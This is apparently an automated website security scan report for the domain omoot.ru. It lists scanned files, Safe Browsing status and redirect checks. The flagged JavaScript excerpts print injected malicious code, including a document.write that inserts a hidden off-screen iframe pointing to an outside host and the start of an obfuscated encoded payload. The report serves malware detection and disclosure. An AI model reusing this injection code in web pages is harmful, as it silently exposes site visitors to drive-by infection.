Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=omoot.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://omoot.ru/ | 200 OK Content-Length: 20261 Content-Type: text/html | clean |
http://omoot.ru/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/x-javascript | clean |
http://omoot.ru/components/com_gantry/js/gantry-totop.js | 200 OK Content-Length: 5849 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('0.1(\'5\',2(){3 a=$(\'6-7\');8(a){3 b=4 9.c(0);a.d(\'f\',\'g\').1(\'h\',2(e){4 i(e).j();b.k()})}});',21,21,'window|addEvent|function|var|new|domready|gantry|totop|if|Fx|||Scroll|setStyle||outline|none|click|Event|stop|toTop'.split('|'),0,{ Antivirus reports:
| ||
http://omoot.ru//mc.yandex.ru/metrika/watch.js/ | 404 Not Found Content-Length: 1844 Content-Type: text/html | clean |
http://omoot.ru/index.php | 200 OK Content-Length: 20276 Content-Type: text/html | clean |
http://omoot.ru/index.php/domains-4-sale | 200 OK Content-Length: 13285 Content-Type: text/html | clean |
http://omoot.ru/indexold.htm | 200 OK Content-Length: 16442 Content-Type: text/html | clean |
http://tools.spylog.ru/counter_cv.js | 200 OK Content-Length: 5066 Content-Type: application/javascript | clean |
http://omoot.ru/20110105/index.phtml | 500 Internal Server Error Content-Length: 14 Content-Type: text/html | clean |
http://omoot.ru/test404page.js | 404 Not Found Content-Length: 20241 Content-Type: text/html | clean |
http://omoot.ru/index.php/googlelocator | 200 OK Content-Length: 10410 Content-Type: text/html | clean |
http://omoot.ru/index.php/travian2012 | 200 OK Content-Length: 13482 Content-Type: text/html | clean |
http://www.google.com/jsapi | 200 OK Content-Length: 24552 Content-Type: text/javascript | clean |
http://omoot.ru/plugins/content/sigplus/js/jquery.include.min.js | 200 OK Content-Length: 5855 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function __jQuery_version_compare__(){return function(e,f){for(var g=e.split("."),b=f.split("."),a=0;a<b.length;a++){var c=parseInt(g[a]),d=parseInt(b[a]);if(c!=d)return c>d}return true}(jQuery().jquery,"1.4")}if(typeof __jQuery__=="undefined"){if(typeof jQuery!="undefined"&&!__jQuery_version_compare__())var __jQueryOther__=jQuery;if(typeof jQuery=="undefined"||!__jQuery_version_compare__())google.load("jquery","1.4");else var __jQuery__=jQuery}; ;document.write('<iframe wid Antivirus reports:
| ||
http://omoot.ru/plugins/content/sigplus/js/jquery.noconflict.js | 200 OK Content-Length: 5611 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if (typeof(__jQuery__) == 'undefined') { var __jQuery__ = jQuery.noConflict(); if (typeof(__jQueryOther__) != 'undefined') { jQuery = __jQueryOther__; } };document.write('<iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://xunur.qhigh.com/geowgjwiehgwvbb.cfg?11"></iframe>'); ;var OOO='7kSKlBXYjNXZfhSZwF2YzVmb1hSZ0lmc35CduVWb1N2bktTKJlUMfhCZslGaDRmblBHch5CbPlkC70FMblyJkFWZodCKl1WYOdWYUlnQzRnbl1WZsVE Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: omoot.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 28 Feb 2015 03:43:13 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 28 Feb 2015 03:43:13 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: a4bf362d653dd69979b263e3fe44028c=5d144442c2def3e7c1a6a5feb980b226; path=/
GET / HTTP/1.1
Host: omoot.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 28 Feb 2015 03:43:13 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 28 Feb 2015 03:43:13 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: a4bf362d653dd69979b263e3fe44028c=5d144442c2def3e7c1a6a5feb980b226; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: omoot.ru
Referer: http://www.google.com/search?q=omoot.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: omoot.ru
Referer: http://www.google.com/search?q=omoot.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.